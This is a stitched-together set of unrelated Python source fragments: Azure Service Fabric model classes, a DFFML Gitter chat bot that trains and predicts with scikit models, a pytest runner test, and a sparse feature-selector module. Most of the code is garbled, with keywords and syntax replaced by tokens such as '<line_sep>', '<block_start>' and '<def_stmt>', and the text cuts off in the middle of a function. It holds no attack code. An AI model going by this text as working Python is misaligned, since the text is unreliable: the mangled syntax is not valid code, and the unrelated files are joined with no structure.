        'replica_restart_wait_duration': {'key': 'replicaRestartWaitDuration', 'type': 'iso-8601'},
        'quorum_loss_wait_duration': {'key': 'quorumLossWaitDuration', 'type': 'iso-8601'},
        'stand_by_replica_keep_duration': {'key': 'standByReplicaKeepDuration', 'type': 'iso-8601'},
    }

    def __init__(self, **kwargs):
        super(StatefulServiceProperties, self).__init__(**kwargs)
        # Discriminator constant for this concrete service kind.
        self.service_kind = 'Stateful'  # type: str
        self.has_persisted_state = kwargs.get('has_persisted_state')
        self.target_replica_set_size = kwargs.get('target_replica_set_size')
        self.min_replica_set_size = kwargs.get('min_replica_set_size')
        self.replica_restart_wait_duration = kwargs.get('replica_restart_wait_duration')
        self.quorum_loss_wait_duration = kwargs.get('quorum_loss_wait_duration')
        self.stand_by_replica_keep_duration = kwargs.get('stand_by_replica_keep_duration')
class StatefulServiceUpdateProperties(ServiceResourceUpdateProperties):
    """The properties of a stateful service resource for patch operations.

    All required parameters must be populated in order to send to Azure.

    :param placement_constraints: The placement constraints as a string.
    :type placement_constraints: str
    :param correlation_scheme: A list that describes the correlation of the service with other
     services.
    :type correlation_scheme: list[~azure.mgmt.servicefabric.models.ServiceCorrelationDescription]
    :param service_load_metrics: The service load metrics is given as an array of
     ServiceLoadMetricDescription objects.
    :type service_load_metrics: list[~azure.mgmt.servicefabric.models.ServiceLoadMetricDescription]
    :param service_placement_policies: A list that describes the correlation of the service with
     other services.
    :type service_placement_policies:
     list[~azure.mgmt.servicefabric.models.ServicePlacementPolicyDescription]
    :param default_move_cost: Specifies the move cost for the service. Possible values include:
     "Zero", "Low", "Medium", "High".
    :type default_move_cost: str or ~azure.mgmt.servicefabric.models.MoveCost
    :param service_kind: Required. The kind of service (Stateless or Stateful). Constant filled
     by server. Possible values include: "Invalid", "Stateless", "Stateful".
    :type service_kind: str or ~azure.mgmt.servicefabric.models.ServiceKind
    :param target_replica_set_size: The target replica set size as a number.
    :type target_replica_set_size: int
    :param min_replica_set_size: The minimum replica set size as a number.
    :type min_replica_set_size: int
    :param replica_restart_wait_duration: The duration between when a replica goes down and when
     a new replica is created, represented in ISO 8601 format (hh:mm:ss.s).
    :type replica_restart_wait_duration: ~datetime.datetime
    :param quorum_loss_wait_duration: The maximum duration for which a partition is allowed to
     be in a state of quorum loss, represented in ISO 8601 format (hh:mm:ss.s).
    :type quorum_loss_wait_duration: ~datetime.datetime
    :param stand_by_replica_keep_duration: The definition on how long StandBy replicas should be
     maintained before being removed, represented in ISO 8601 format (hh:mm:ss.s).
    :type stand_by_replica_keep_duration: ~datetime.datetime
    """

    _validation = {
        'service_kind': {'required': True},
        'target_replica_set_size': {'minimum': 1},
        'min_replica_set_size': {'minimum': 1},
    }

    _attribute_map = {
        'placement_constraints': {'key': 'placementConstraints', 'type': 'str'},
        'correlation_scheme': {'key': 'correlationScheme', 'type': '[ServiceCorrelationDescription]'},
        'service_load_metrics': {'key': 'serviceLoadMetrics', 'type': '[ServiceLoadMetricDescription]'},
        'service_placement_policies': {'key': 'servicePlacementPolicies', 'type': '[ServicePlacementPolicyDescription]'},
        'default_move_cost': {'key': 'defaultMoveCost', 'type': 'str'},
        'service_kind': {'key': 'serviceKind', 'type': 'str'},
        'target_replica_set_size': {'key': 'targetReplicaSetSize', 'type': 'int'},
        'min_replica_set_size': {'key': 'minReplicaSetSize', 'type': 'int'},
        'replica_restart_wait_duration': {'key': 'replicaRestartWaitDuration', 'type': 'iso-8601'},
        'quorum_loss_wait_duration': {'key': 'quorumLossWaitDuration', 'type': 'iso-8601'},
        'stand_by_replica_keep_duration': {'key': 'standByReplicaKeepDuration', 'type': 'iso-8601'},
    }

    def __init__(self, **kwargs):
        super(StatefulServiceUpdateProperties, self).__init__(**kwargs)
        # Discriminator constant for this concrete service kind.
        self.service_kind = 'Stateful'  # type: str
        self.target_replica_set_size = kwargs.get('target_replica_set_size')
        self.min_replica_set_size = kwargs.get('min_replica_set_size')
        self.replica_restart_wait_duration = kwargs.get('replica_restart_wait_duration')
        self.quorum_loss_wait_duration = kwargs.get('quorum_loss_wait_duration')
        self.stand_by_replica_keep_duration = kwargs.get('stand_by_replica_keep_duration')
class StatelessServiceProperties(ServiceResourceProperties):
    """The properties of a stateless service resource.

    Variables are only populated by the server, and will be ignored when sending a request.

    All required parameters must be populated in order to send to Azure.

    :param placement_constraints: The placement constraints as a string.
    :type placement_constraints: str
    :param correlation_scheme: A list that describes the correlation of the service with other
     services.
    :type correlation_scheme: list[~azure.mgmt.servicefabric.models.ServiceCorrelationDescription]
    :param service_load_metrics: The service load metrics is given as an array of
     ServiceLoadMetricDescription objects.
    :type service_load_metrics: list[~azure.mgmt.servicefabric.models.ServiceLoadMetricDescription]
    :param service_placement_policies: A list that describes the correlation of the service with
     other services.
    :type service_placement_policies:
     list[~azure.mgmt.servicefabric.models.ServicePlacementPolicyDescription]
    :param default_move_cost: Specifies the move cost for the service. Possible values include:
     "Zero", "Low", "Medium", "High".
    :type default_move_cost: str or ~azure.mgmt.servicefabric.models.MoveCost
    :ivar provisioning_state: The current deployment or provisioning state, which only appears
     in the response.
    :vartype provisioning_state: str
    :param service_kind: Required. The kind of service (Stateless or Stateful). Constant filled
     by server. Possible values include: "Invalid", "Stateless", "Stateful".
    :type service_kind: str or ~azure.mgmt.servicefabric.models.ServiceKind
    :param service_type_name: The name of the service type.
    :type service_type_name: str
    :param partition_description: Describes how the service is partitioned.
    :type partition_description: ~azure.mgmt.servicefabric.models.PartitionSchemeDescription
    :param service_package_activation_mode: The activation Mode of the service package. Possible
     values include: "SharedProcess", "ExclusiveProcess".
    :type service_package_activation_mode: str or
     ~azure.mgmt.servicefabric.models.ArmServicePackageActivationMode
    :param service_dns_name: Dns name used for the service. If this is specified, then the
     service can be accessed via its DNS name instead of service name.
    :type service_dns_name: str
    :param instance_count: The instance count.
    :type instance_count: int
    :param instance_close_delay_duration: Delay duration for RequestDrain feature to ensures
     that the endpoint advertised by the stateless instance is removed before the delay starts
     prior to closing the instance. This delay enables existing requests to drain gracefully
     before the instance actually goes down
     (https://docs.microsoft.com/en-us/azure/service-fabric/service-fabric-application-upgrade-advanced#avoid-connection-drops-during-stateless-service-planned-downtime-preview).
     It is first interpreted as a string representing an ISO 8601 duration. If that fails, then
     it is interpreted as a number representing the total number of milliseconds.
    :type instance_close_delay_duration: str
    """

    _validation = {
        'provisioning_state': {'readonly': True},
        'service_kind': {'required': True},
        'instance_count': {'minimum': -1},
    }

    _attribute_map = {
        'placement_constraints': {'key': 'placementConstraints', 'type': 'str'},
        'correlation_scheme': {'key': 'correlationScheme', 'type': '[ServiceCorrelationDescription]'},
        'service_load_metrics': {'key': 'serviceLoadMetrics', 'type': '[ServiceLoadMetricDescription]'},
        'service_placement_policies': {'key': 'servicePlacementPolicies', 'type': '[ServicePlacementPolicyDescription]'},
        'default_move_cost': {'key': 'defaultMoveCost', 'type': 'str'},
        'provisioning_state': {'key': 'provisioningState', 'type': 'str'},
        'service_kind': {'key': 'serviceKind', 'type': 'str'},
        'service_type_name': {'key': 'serviceTypeName', 'type': 'str'},
        'partition_description': {'key': 'partitionDescription', 'type': 'PartitionSchemeDescription'},
        'service_package_activation_mode': {'key': 'servicePackageActivationMode', 'type': 'str'},
        'service_dns_name': {'key': 'serviceDnsName', 'type': 'str'},
        'instance_count': {'key': 'instanceCount', 'type': 'int'},
        'instance_close_delay_duration': {'key': 'instanceCloseDelayDuration', 'type': 'str'},
    }

    def __init__(self, **kwargs):
        super(StatelessServiceProperties, self).__init__(**kwargs)
        # Discriminator constant for this concrete service kind.
        self.service_kind = 'Stateless'  # type: str
        self.instance_count = kwargs.get('instance_count')
        self.instance_close_delay_duration = kwargs.get('instance_close_delay_duration')
class StatelessServiceUpdateProperties(ServiceResourceUpdateProperties):
    """The properties of a stateless service resource for patch operations.

    All required parameters must be populated in order to send to Azure.

    :param placement_constraints: The placement constraints as a string.
    :type placement_constraints: str
    :param correlation_scheme: A list that describes the correlation of the service with other
     services.
    :type correlation_scheme: list[~azure.mgmt.servicefabric.models.ServiceCorrelationDescription]
    :param service_load_metrics: The service load metrics is given as an array of
     ServiceLoadMetricDescription objects.
    :type service_load_metrics: list[~azure.mgmt.servicefabric.models.ServiceLoadMetricDescription]
    :param service_placement_policies: A list that describes the correlation of the service with
     other services.
    :type service_placement_policies:
     list[~azure.mgmt.servicefabric.models.ServicePlacementPolicyDescription]
    :param default_move_cost: Specifies the move cost for the service. Possible values include:
     "Zero", "Low", "Medium", "High".
    :type default_move_cost: str or ~azure.mgmt.servicefabric.models.MoveCost
    :param service_kind: Required. The kind of service (Stateless or Stateful). Constant filled
     by server. Possible values include: "Invalid", "Stateless", "Stateful".
    :type service_kind: str or ~azure.mgmt.servicefabric.models.ServiceKind
    :param instance_count: The instance count.
    :type instance_count: int
    :param instance_close_delay_duration: Delay duration for RequestDrain feature to ensures
     that the endpoint advertised by the stateless instance is removed before the delay starts
     prior to closing the instance. This delay enables existing requests to drain gracefully
     before the instance actually goes down
     (https://docs.microsoft.com/en-us/azure/service-fabric/service-fabric-application-upgrade-advanced#avoid-connection-drops-during-stateless-service-planned-downtime-preview).
     It is first interpreted as a string representing an ISO 8601 duration. If that fails, then
     it is interpreted as a number representing the total number of milliseconds.
    :type instance_close_delay_duration: str
    """

    _validation = {
        'service_kind': {'required': True},
        'instance_count': {'minimum': -1},
    }

    _attribute_map = {
        'placement_constraints': {'key': 'placementConstraints', 'type': 'str'},
        'correlation_scheme': {'key': 'correlationScheme', 'type': '[ServiceCorrelationDescription]'},
        'service_load_metrics': {'key': 'serviceLoadMetrics', 'type': '[ServiceLoadMetricDescription]'},
        'service_placement_policies': {'key': 'servicePlacementPolicies', 'type': '[ServicePlacementPolicyDescription]'},
        'default_move_cost': {'key': 'defaultMoveCost', 'type': 'str'},
        'service_kind': {'key': 'serviceKind', 'type': 'str'},
        'instance_count': {'key': 'instanceCount', 'type': 'int'},
        'instance_close_delay_duration': {'key': 'instanceCloseDelayDuration', 'type': 'str'},
    }

    def __init__(self, **kwargs):
        super(StatelessServiceUpdateProperties, self).__init__(**kwargs)
        # Discriminator constant for this concrete service kind.
        self.service_kind = 'Stateless'  # type: str
        self.instance_count = kwargs.get('instance_count')
        self.instance_close_delay_duration = kwargs.get('instance_close_delay_duration')
:type last_modified_at: ~datetime.datetime """<line_sep>_attribute_map={'created_by':{'key':'createdBy' 'type':'str'} 'created_by_type':{'key':'createdByType' 'type':'str'} 'created_at':{'key':'createdAt' 'type':'iso-8601'} 'last_modified_by':{'key':'lastModifiedBy' 'type':'str'} 'last_modified_by_type':{'key':'lastModifiedByType' 'type':'str'} 'last_modified_at':{'key':'lastModifiedAt' 'type':'iso-8601'} }<def_stmt>__init__ self **kwargs<block_start>super(SystemData self).__init__(**kwargs)<line_sep>self.created_by=kwargs.get('created_by' <none>)<line_sep>self.created_by_type=kwargs.get('created_by_type' <none>)<line_sep>self.created_at=kwargs.get('created_at' <none>)<line_sep>self.last_modified_by=kwargs.get('last_modified_by' <none>)<line_sep>self.last_modified_by_type=kwargs.get('last_modified_by_type' <none>)<line_sep>self.last_modified_at=kwargs.get('last_modified_at' <none>)<block_end><block_end><class_stmt>UniformInt64RangePartitionSchemeDescription(PartitionSchemeDescription)<block_start>"""Describes a partitioning scheme where an integer range is allocated evenly across a number of partitions. All required parameters must be populated in order to send to Azure. :param partition_scheme: Required. Specifies how the service is partitioned.Constant filled by server. Possible values include: "Invalid", "Singleton", "UniformInt64Range", "Named". :type partition_scheme: str or ~azure.mgmt.servicefabric.models.PartitionScheme :param count: Required. The number of partitions. :type count: int :param low_key: Required. String indicating the lower bound of the partition key range that should be split between the partition ‘count’. :type low_key: str :param high_key: Required. String indicating the upper bound of the partition key range that should be split between the partition ‘count’. 
:type high_key: str """<line_sep>_validation={'partition_scheme':{'required':<true>} 'count':{'required':<true>} 'low_key':{'required':<true>} 'high_key':{'required':<true>} }<line_sep>_attribute_map={'partition_scheme':{'key':'partitionScheme' 'type':'str'} 'count':{'key':'count' 'type':'int'} 'low_key':{'key':'lowKey' 'type':'str'} 'high_key':{'key':'highKey' 'type':'str'} }<def_stmt>__init__ self **kwargs<block_start>super(UniformInt64RangePartitionSchemeDescription self).__init__(**kwargs)<line_sep>self.partition_scheme='UniformInt64Range'# type: str self.count=kwargs['count']<line_sep>self.low_key=kwargs['low_key']<line_sep>self.high_key=kwargs['high_key']<block_end><block_end><class_stmt>UpgradableVersionPathResult(msrest.serialization.Model)<block_start>"""The list of intermediate cluster code versions for an upgrade or downgrade. Or minimum and maximum upgradable version if no target was given. :param supported_path: :type supported_path: list[str] """<line_sep>_attribute_map={'supported_path':{'key':'supportedPath' 'type':'[str]'} }<def_stmt>__init__ self **kwargs<block_start>super(UpgradableVersionPathResult self).__init__(**kwargs)<line_sep>self.supported_path=kwargs.get('supported_path' <none>)<block_end><block_end><class_stmt>UpgradableVersionsDescription(msrest.serialization.Model)<block_start>"""UpgradableVersionsDescription. All required parameters must be populated in order to send to Azure. :param target_version: Required. The target code version. :type target_version: str """<line_sep>_validation={'target_version':{'required':<true>} }<line_sep>_attribute_map={'target_version':{'key':'targetVersion' 'type':'str'} }<def_stmt>__init__ self **kwargs<block_start>super(UpgradableVersionsDescription self).__init__(**kwargs)<line_sep>self.target_version=kwargs['target_version']<block_end><block_end><class_stmt>UserAssignedIdentity(msrest.serialization.Model)<block_start>"""UserAssignedIdentity. 
Variables are only populated by the server, and will be ignored when sending a request. :ivar principal_id: The principal id of user assigned identity. :vartype principal_id: str :ivar client_id: The client id of user assigned identity. :vartype client_id: str """<line_sep>_validation={'principal_id':{'readonly':<true>} 'client_id':{'readonly':<true>} }<line_sep>_attribute_map={'principal_id':{'key':'principalId' 'type':'str'} 'client_id':{'key':'clientId' 'type':'str'} }<def_stmt>__init__ self **kwargs<block_start>super(UserAssignedIdentity self).__init__(**kwargs)<line_sep>self.principal_id=<none><line_sep>self.client_id=<none><block_end><block_end>
<import_stmt>io<import_stmt>re<import_stmt>json<import_stmt>tempfile<import_stmt>contextlib<import_from_stmt>aiohttp ClientSession ClientTimeout<import_from_stmt>dffml.cli.cli CLI<import_from_stmt>dffml op config Definition BaseSecret<line_sep>ACCESSTOKEN=Definition(name="access_token" primitive="str")<line_sep>ROOMNAME=Definition(name="room_name" primitive="str")<line_sep>ROOMID=Definition(name="room_id" primitive="str")<line_sep>MESSAGE=Definition(name="message" primitive="str")<line_sep>TOSEND=Definition(name="to_send" primitive="str")<line_sep>@config<class_stmt>GitterChannelConfig<block_start>secret:BaseSecret<block_end>@op(inputs={"room_uri":ROOMNAME} outputs={"room_id":ROOMID} config_cls=GitterChannelConfig imp_enter={"secret":<lambda>self:self.config.secret "session":<lambda>self:ClientSession(trust_env=<true>) } ctx_enter={"sctx":<lambda>self:self.parent.secret()} )<async_keyword><def_stmt>get_room_id self room_uri# Get unique roomid from room uri <block_start>access_token=<await>self.sctx.get("access_token")<line_sep>headers={"Content-Type":"application/json" "Accept":"application/json" "Authorization":f"Bearer {access_token}" }<line_sep>api_url=<await>self.sctx.get("api_url")<line_sep>url=f"{api_url}/rooms"<async_keyword><with_stmt>self.parent.session.post(url json={"uri":room_uri} headers=headers)<as>resp<block_start>response=<await>resp.json()<line_sep><return>{"room_id":response["id"]}<block_end><block_end>@op(inputs={"room_id":ROOMID} outputs={"message":MESSAGE} config_cls=GitterChannelConfig imp_enter={"secret":<lambda>self:self.config.secret "session":<lambda>self:ClientSession(trust_env=<true> timeout=ClientTimeout(total=<none>)) } ctx_enter={"sctx":<lambda>self:self.parent.secret()} )<async_keyword><def_stmt>stream_chat self room_id# Listen to messages in room <block_start>access_token=<await>self.sctx.get("access_token")<line_sep>headers={"Accept":"application/json" "Authorization":f"Bearer {access_token}" 
}<line_sep>stream_url=<await>self.sctx.get("stream_url")<line_sep>url=f"{stream_url}/rooms/{room_id}/chatMessages"<line_sep>botname=<await>self.sctx.get("botname")<async_keyword><with_stmt>self.parent.session.get(url headers=headers)<as>resp<block_start><async_keyword><for_stmt>data resp.content# Gitter sends " \n" at some intervals <block_start><if_stmt>data<eq>" \n".encode()<block_start><continue><block_end>data=json.loads(data.strip())<line_sep>message=data["text"]<line_sep># Only listen to messages directed to bot <if_stmt>f"@{botname}"<not><in>message<block_start><continue><block_end><yield>{"message":message}<block_end><block_end><block_end>@op(inputs={"message":TOSEND "room_id":ROOMID} config_cls=GitterChannelConfig imp_enter={"secret":<lambda>self:self.config.secret "session":<lambda>self:ClientSession(trust_env=<true>) } ctx_enter={"sctx":<lambda>self:self.parent.secret()} )<async_keyword><def_stmt>send_message self message room_id<block_start>access_token=<await>self.sctx.get("access_token")<line_sep>headers={"Content-Type":"application/json" "Accept":"application/json" "Authorization":f"Bearer {access_token}" }<try_stmt><block_start>message=json.loads(message)<line_sep>message=json.dumps(message indent=4 sort_keys=<true>)<block_end><except_stmt><block_start><pass><block_end># For new line we need \\n,else Gitter api # responds with 'Bad Request' message=message.replace("\n" "\\n")<line_sep>api_url=<await>self.sctx.get("api_url")<line_sep>url=f"{api_url}/rooms/{room_id}/chatMessages"<async_keyword><with_stmt>self.parent.session.post(url headers=headers json={"text":message})<as>resp<block_start>response=<await>resp.json()<line_sep><return><block_end><block_end>@op(inputs={"message":MESSAGE } outputs={"message":TOSEND} config_cls=GitterChannelConfig imp_enter={"secret":<lambda>self:self.config.secret} ctx_enter={"sctx":<lambda>self:self.parent.secret()} )<async_keyword><def_stmt>interpret_message self message<block_start>greet=["hey" "hello" 
"hi"]<for_stmt>x greet<block_start><if_stmt>x<in>message.lower()<block_start><return>{"message":"Hey Hooman ฅ^•ﻌ•^ฅ"}<block_end><block_end><def_stmt>extract_data raw_data<block_start>""" Parses data from text eg >>> raw_data = " details: features: Years:int:1 Expertise:int:1 Trust:float:1 predict: Salary:float:1 data: Years,Expertise,Trust,Salary 0,1,0.1,10 1,3,0.2,20 2,5,0.3,30 3,7,0.4,40 " >>> extract_data(raw_data) { model-data: " Years,Expertise,Trust,Salary 0,1,0.1,10 1,3,0.2,20 2,5,0.3,30 3,7,0.4,40 " , features: Years:int:1 Expertise:int:1 Trust:float:1 , predict: Salary:float:1 } """<line_sep>raw_data=raw_data.split("data:")# (Feature details, training data) data={"model-data":raw_data[1]}<line_sep>raw_data=raw_data[0].split("\n")<line_sep># splits feature details to separate lines # Iterate and add to to dictionary `data` <for_stmt>x raw_data<block_start>k,*v=x.split(":")<if_stmt>isinstance(v list)# for features <block_start>v=":".join(v)<block_end>k=k.strip()<line_sep>v=v.strip()<if_stmt>k# avoid blank <block_start>data[k]=v<block_end><block_end><return>data<block_end># Removing username from message # The regex matches @ followed by anything that # is not a whitespace in the first group and # the rest of the string in the second group. # We replace the string by the second group. 
message=re.sub(r"(@[^\s]+)(.*)" r"\2" message).strip()<if_stmt>message.lower().startswith("train model")<block_start><return>{"message":"Gimme more info!!"}<block_end><elif_stmt>message.lower().startswith("predict:")# Only replace first occurrence of predict # because the feature to predict will be labeled predict <block_start>raw_data=message.replace("predict:" "" 1).strip()<line_sep>cmds=["predict" "all"]<block_end><elif_stmt>message.lower().startswith("details:")<block_start>raw_data=message.replace("details:" "" ).strip()<line_sep>cmds=["train"]<block_end><else_stmt><block_start><return>{"message":" Oops ,I didnt get that ᕙ(⇀‸↼‶)ᕗ "}<block_end># We'll use scikit logistic regression data=extract_data(raw_data)<line_sep>model_type="scikitlr"<line_sep>features=data["features"].split(" ")<line_sep>predict=data["predict"]<line_sep>model_data=data["model-data"]<with_stmt>tempfile.NamedTemporaryFile(suffix=".csv")<as>fileobj<block_start>fileobj.write(model_data.lstrip().encode())<line_sep>fileobj.seek(0)<line_sep>stdout=io.StringIO()<with_stmt>contextlib.redirect_stdout(stdout)<block_start>preds=<await>CLI.cli(*cmds "-model" model_type "-model-location" "tempModel" "-model-features" *features "-model-predict" predict "-sources" "f=csv" "-source-filename" fileobj.name )<block_end><block_end><if_stmt>"train"<in>cmds<block_start><return>{"message":"Done!!"}<block_end><else_stmt><block_start>m={}<for_stmt>pred preds<block_start>pred=pred.predictions()<line_sep>m.update({p:pred[p]["value"]<for>p pred})<block_end>message=[f"{k}: {v}"<for>k,v m.items()]<line_sep>message="\n".join(message)<block_end><return>{"message":message}<block_end>
<import_stmt>pytest<import_from_stmt>unittest.mock patch<import_stmt>tests.fixtures.journal<as>FakeJournalExporter<import_from_stmt>systemdlogger.elasticsearch ElasticsearchLogger<line_sep>@pytest.mark.parametrize(('config_path') ['tests/fixtures/config_es.json'])<class_stmt>TestRunner<block_start><def_stmt>setup_method self method<block_start>""" setup any state tied to the execution of the given method in a class. setup_method is invoked for every test method of a class. """<line_sep>modules={'systemdlogger.journal':FakeJournalExporter}<line_sep>self.module_patcher=patch.dict('sys.modules' modules)<line_sep>self.module_patcher.start()<import_from_stmt>systemdlogger.runner Runner<line_sep>self.Runner=Runner<block_end><def_stmt>teardown_method self method<block_start>""" teardown any state that was previously setup with a setup_method call. """<line_sep>self.module_patcher.stop()<block_end><def_stmt>test_init self config_path<block_start>runner=self.Runner(config_path)<assert_stmt>len(runner.loggers)<eq>1<assert_stmt>isinstance(runner.loggers[0] ElasticsearchLogger)<block_end><def_stmt>test_run self config_path<block_start>runner=self.Runner(config_path)<line_sep>runner.run()<block_end><block_end>
""" Selectors """<import_stmt>inspect<import_from_stmt>collections defaultdict<import_from_stmt>itertools combinations<import_from_stmt>typing List Optional Union Dict Callable<import_stmt>numpy<as>np<import_from_stmt>scipy.linalg lstsq<import_from_stmt>scipy.optimize minimize NonlinearConstraint<import_from_stmt>sklearn.linear_model LinearRegression<import_from_stmt>sklearn.metrics get_scorer<import_from_stmt>joblib Parallel delayed<line_sep># pylint: disable=R0201 <class_stmt>BaseSelector<block_start>""" Feature selector. This is meant to work on relatively smaller number of features """<def_stmt>__init__ self coef_thres:float=1e-6 method:str="SLSQP"<block_start>""" Base selector Args: coef_thres (float): threshold to discard certain coefficents method (str): optimization methods in scipy.optmize.minimize """<line_sep>self.coef_thres=coef_thres<line_sep>self.is_fitted=<false><line_sep>self.coef_:Optional[np.ndarray]=<none><line_sep>self.method=method<line_sep>self.indices:Optional[np.ndarray]=<none><block_end><def_stmt>select self x:np.ndarray y:np.ndarray options:Optional[Dict]=<none><arrow>Optional[np.ndarray]<block_start>""" Select feature indices from x Args: x (np.ndarray): MxN input data array y (np.ndarray): M output targets options (dict): options in the optimizations provided to scipy.optimize.minimize Returns: list of int indices """<line_sep>n_data,n_dim=x.shape<line_sep>options=options<or>{"maxiter":1e4 "ftol":1e-12}<line_sep>res=minimize(<lambda>beta:self.construct_loss(x=x y=y beta=beta) [0]<times>n_dim jac=self.construct_jac(x=x y=y) method=self.method constraints=self.construct_constraints(x=x y=y) options=options )<if_stmt>res.status<ne>0<block_start><raise>RuntimeError(f"Not converged, status {res.status}")<block_end>self.is_fitted=<true><line_sep>self.coef_=res.x<line_sep># output coefficient indices that are above certain thresholds self.indices=np.where(np.abs(self.coef_)<g>self.coef_thres)[0]# type: ignore 
self.coef_[np.where(np.abs(self.coef_)<le>self.coef_thres)[0]]=0.0# type: ignore <return>self.indices<block_end><def_stmt>construct_loss self x:np.ndarray y:np.ndarray beta:np.ndarray<arrow>float<block_start>""" Get loss function from data and tentative coefficients beta Args: x (np.ndarray): MxN input data array y (np.ndarray): M output targets beta (np.ndarray): N coefficients Returns: loss value """<line_sep><raise>NotImplementedError<block_end><def_stmt>construct_constraints self x:np.ndarray y:np.ndarray beta:Optional[np.ndarray]=<none><arrow>Optional[Union[Dict List NonlinearConstraint]]<block_start>""" Get constraints dictionary from data, e.g., {"func": lambda beta: fun(x, y, beta), "type": "ineq"} Args: x (np.ndarray): MxN input data array y (np.ndarray): M output targets beta (np.ndarray): parameter to optimize Returns: dict of constraints """<line_sep><return><none><block_end><def_stmt>construct_jac self x:np.ndarray y:np.ndarray<arrow>Optional[Callable]<block_start>""" Jacobian of cost function Args: x (np.ndarray): MxN input data array y (np.ndarray): M output targets Returns: Jacobian function """<line_sep><return><none><block_end><def_stmt>evaluate self x:np.ndarray y:np.ndarray metric:str="neg_mean_absolute_error"<arrow>float<block_start>""" Evaluate the linear models using x, and y test data Args: x (np.ndarray): MxN input data array y (np.ndarray): M output targets metric (str): scorer function, used with sklearn.metrics.get_scorer Returns: """<line_sep>metric_func=get_scorer(metric)<line_sep>lr=LinearRegression(fit_intercept=<false>)<line_sep>lr.coef_=self.coef_[self.indices]# type: ignore lr.intercept_=0<line_sep><return>metric_func(lr x[: self.indices] y)<block_end><def_stmt>get_coef self<arrow>Optional[np.ndarray]<block_start>""" Get coefficients Returns: the coefficients array """<line_sep><return>self.coef_<block_end><def_stmt>get_feature_indices self<arrow>Optional[np.ndarray]<block_start>""" Get selected feature indices Returns: 
"""<line_sep><return>self.indices<block_end><def_stmt>predict self x:np.ndarray<arrow>np.ndarray<block_start>""" Predict the results using sparsified coefficients Args: x (np.ndarray): design matrix Returns: """<line_sep><return>x[: self.indices].dot(self.coef_[self.indices])<block_end># type: ignore <def_stmt>compute_residual self x:np.ndarray y:np.ndarray<arrow>np.ndarray<block_start>""" Compute Args: x (np.ndarray): design matrix y (np.ndarray): target vector Returns: residual vector """<line_sep><return>y-self.predict(x)<block_end>@classmethod<def_stmt>_get_param_names cls<block_start>init=getattr(cls.__init__ "deprecated_original" cls.__init__)<if_stmt>init<is>object.__init__<block_start><return>[]<block_end>init_signature=inspect.signature(init)<line_sep>parameters=[p<for>p init_signature.parameters.values()<if>p.name<ne>"self"<and>p.kind<ne>p.VAR_KEYWORD]<for_stmt>p parameters<block_start><if_stmt>p.kind<eq>p.VAR_KEYWORD<block_start><raise>RuntimeError("scikit-learn estimators should always "<concat>"specify their parameters in the signature"<concat>" of their __init__ (no varargs)."<concat>" %s with constructor %s doesn't "<concat>" follow this convention."%(cls init_signature))<block_end><block_end><return>sorted([p.name<for>p parameters])<block_end><def_stmt>get_params self<block_start>""" Get params for this selector Returns: mapping of string to any parameter names mapped to their values """<line_sep>out={}<for_stmt>key self._get_param_names()<block_start>value=getattr(self key <none>)<line_sep>out[key]=value<block_end><return>out<block_end><def_stmt>set_params self **params<block_start>""" Set the parameters of this selector Args: **params: dict Selector parametrs Returns: self: selector instance """<if_stmt><not>params# Simple optimization to gain speed (inspect is slow) <block_start><return>self<block_end>valid_params=self.get_params()<line_sep>nested_params=defaultdict(dict)# grouped by prefix <for_stmt>key,value 
params.items()<block_start>key,delim,sub_key=key.partition("__")<if_stmt>key<not><in>valid_params<block_start><raise>ValueError("Invalid parameter %s for selector %s. "<concat>"Check the list of available parameters "<concat>"with `estimator.get_params().keys()`."%(key self))<block_end><if_stmt>delim<block_start>nested_params[key][sub_key]=value<block_end><else_stmt><block_start>setattr(self key value)<line_sep>valid_params[key]=value<block_end><block_end><for_stmt>key,sub_params nested_params.items()<block_start>valid_params[key].set_params(**sub_params)<block_end><return>self<block_end><block_end><class_stmt>DantzigSelector(BaseSelector)<block_start>""" Equation 11 in https://orfe.princeton.edu/~jqfan/papers/06/SIS.pdf and reference in https://projecteuclid.org/download/pdfview_1/euclid.aos/1201012958 """<def_stmt>__init__ self lambd sigma=1.0 **kwargs<block_start>""" Dantzig selector Args: lamb: tunable parameter sigma: standard deviation of the error """<line_sep>self.lambd=lambd<line_sep>self.sigma=sigma<line_sep>super().__init__(**kwargs)<block_end><def_stmt>construct_loss self x y beta<arrow>float<block_start>""" Get loss function from data and tentative coefficients beta Args: x (np.ndarray): MxN input data array y (np.ndarray): M output targets beta (np.ndarray): N coefficients Returns: loss value """<line_sep><return>np.sum(np.abs(beta)).item()<block_end><def_stmt>construct_jac self x:np.ndarray y:np.ndarray<arrow>Callable<block_start>""" Jacobian of cost functions Args: x: y: Returns: """<def_stmt>_jac beta<block_start>sign=np.sign(beta)<line_sep>sign[np.abs(sign)<l>0.1]=1.0<line_sep>sign<augmul>30.0# multiply the gradients to get better convergence <return>sign<block_end><return>_jac<block_end><def_stmt>construct_constraints self x:np.ndarray y:np.ndarray beta:Optional[np.ndarray]=<none><arrow>NonlinearConstraint<block_start>""" Get constraints dictionary from data, e.g., {"func": lambda beta: fun(x, y, beta), "type": "ineq"} Args: x (np.ndarray): MxN 
input data array y (np.ndarray): M output targets beta (np.ndarray): placeholder Returns: dict of constraints """<def_stmt>_constraint beta<block_start><return>np.linalg.norm(x.T@(y-x@beta) np.infty)<block_end><def_stmt>_jac beta<block_start>vec=x.T@(y-x@beta)<line_sep>max_ind=np.argmax(np.abs(vec))<line_sep>der=np.zeros_like(vec.ravel())<line_sep>der[max_ind]=np.sign(vec[max_ind])<line_sep><return>-x.T.dot(x).dot(der)<block_end><return>NonlinearConstraint(_constraint -np.infty self.lambd<times>self.sigma jac=_jac)<block_end><block_end><class_stmt>PenalizedLeastSquares(BaseSelector)<block_start>""" Penalized least squares. In addition to minimizing the sum of squares loss, it adds an additional penalty to the coefficients """<def_stmt>construct_loss self x:np.ndarray y:np.ndarray beta:np.ndarray<arrow>float<block_start>""" Construct the loss function. An extra penalty term is added Args: x (np.ndarray): MxN input data array y (np.ndarray): M output targets beta (np.ndarray): N coefficients Returns: sum of errors """<line_sep>n=x.shape[0]<line_sep>se=1.0/(2<times>n)<times>np.sum((y-x.dot(beta))<power>2)+self.penalty(beta x=x y=y)<line_sep><return>se<block_end><def_stmt>_sse_jac self x y beta<block_start>n=x.shape[0]<line_sep><return>1.0/n<times>(y-x.dot(beta)).T.dot(-x)<block_end><def_stmt>_penalty_jac self x y beta<block_start><return>0.0<block_end><def_stmt>construct_jac self x:np.ndarray y:np.ndarray<block_start>""" Construct the jacobian of loss function Args: x (np.ndarray): MxN input data array y (np.ndarray): M output targets Returns: jacobian vector """<def_stmt>_jac 